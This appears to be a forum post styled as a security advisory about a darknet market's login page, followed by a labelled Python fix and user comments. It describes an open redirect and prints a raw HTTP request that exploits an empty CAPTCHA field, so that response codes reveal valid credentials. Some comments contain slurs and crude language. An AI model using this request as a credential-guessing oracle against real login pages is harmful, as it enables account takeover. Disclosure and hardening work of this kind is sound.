DHL Security Advisory - URL Redirect & CAPTCHA Bypass

Basically, http://darkheroesq46awl.onion/login suffers from 2 vulnerabilities:

  1. Arbitrary URL Redirect
  2. CAPTCHA Bypass (CWE-203: Information Exposure Through Discrepancy)

The "Arbitrary URL Redirect" affects the POST parameter redirect_to. An attacker can use this to trick you into visiting a phishing site, or worse, deanonymize you.

Regarding "CAPTCHA Bypass", the CAPTCHA parameter in the login POST request is "ct_captcha". If you unset this (NULL value) or simply delete it, then you will get the "302" redirect if and only if the credentials are correct. Below is an example of a request that triggers this vulnerability:

POST /login HTTP/1.1
Host: darkheroesq46awl.onion
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://darkheroesq46awl.onion/register?i=
Cookie: PHPSESSID=a
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

redirect_to=https://www.example.com&username=USERNAME&password=PASSWORD&ct_captcha=&submit=Login+Now

Notice that "ct_captcha" has a null value. When USERNAME and PASSWORD equal a valid pair for an existing user, the HTTP response code is "302". When the pair is invalid (like if you guessed a wrong password), the response code is "200".

Using this, it is possible to compromise accounts with shitty passwords very easily.

Be safe,

Your friendly DN Security Consultant.
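
The server-side fix for both issues, as an added example that is not part of the original post or the market's own code: a Python login handler that fails closed when ct_captcha is missing or empty, returns one identical response for every failure so valid and invalid credentials cannot be told apart, and only honours a site-relative redirect_to. USERS, DEFAULT_LANDING, the session key captcha_answer and the error path are constructed assumptions.

```python
from urllib.parse import urlparse
import hmac

# Constructed sample credential store for this example (not from the advisory).
# A real deployment stores password hashes; plaintext here keeps the example short.
USERS = {"alice": "correct horse battery staple"}
DEFAULT_LANDING = "/"  # where a login lands when redirect_to is absent or unsafe


def safe_redirect_target(candidate):
    """Accept only a site-relative path as the post-login destination.

    Absolute URLs (any scheme or host), protocol-relative '//host' and
    backslash variants that browsers normalise to '//' all fall back to
    DEFAULT_LANDING, which closes the arbitrary redirect.
    """
    if not isinstance(candidate, str) or not candidate.startswith("/"):
        return DEFAULT_LANDING
    if candidate.startswith("//") or "\\" in candidate:
        return DEFAULT_LANDING
    parsed = urlparse(candidate)
    if parsed.scheme or parsed.netloc:
        return DEFAULT_LANDING
    return candidate


def login_hardened(form, session):
    """Process the login form; returns (http_status, location).

    Fixes the CAPTCHA flaw in two ways: a missing or empty ct_captcha fails
    closed, and every failure returns the same status and page regardless of
    whether the credentials were right, so the response carries no oracle.
    """
    # Single-use challenge: remove it so a replayed answer cannot be reused.
    expected = session.pop("captcha_answer", None) or ""
    supplied = form.get("ct_captcha") or ""
    captcha_ok = bool(expected) and hmac.compare_digest(
        supplied.encode(), expected.encode()
    )

    stored = USERS.get(form.get("username", ""), "")
    creds_ok = bool(stored) and hmac.compare_digest(
        form.get("password", "").encode(), stored.encode()
    )

    if not (captcha_ok and creds_ok):
        # One generic failure path: wrong CAPTCHA, unknown user and wrong
        # password are indistinguishable to the client.
        return 200, "/login?error=1"
    return 302, safe_redirect_target(form.get("redirect_to"))
```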


Comments


[6 Points] poopybutt9000:

How is this not upvoted massively?

Thank you for taking the time to contribute this my friend.


[5 Points] t0mcheck:

..


[4 Points] Lat3ris:

Is it just me, or is this sub entertaining?


[2 Points] None:

I logged in to say thank you as well! Don't want you to think you weren't appreciated (even though I use none of these services and my erection grows softer every day with shit that comes out on the darknets). There needs to be a subreddit just for this so even if it gets "buried" it's able to be easily found.


[2 Points] None:

Hey I have a good idea, don't use DHL!!


[2 Points] None:

Great post buddy. Keep up the good work!


[2 Points] Christisrealnigga:

Can you imagine how many hits LE must be having using AB and Hansa dumps lol

Now that I think of it why aren't large markets having a huge pass reset (especially private ones)


[2 Points] sharpshooter789:

The redirect_to parameter isn't a real vulnerability.

However, the captcha bypass does indeed work. It doesn't log in to the account, but it returns the login prompt with no message. When a bad password is used it tells you. This could be used to brute force accounts.


[1 Points] Invictus-Animus:

Or you can login from the upper bar without the captcha


[1 Points] Bigw0rmer:

This market is getting ripped apart, lol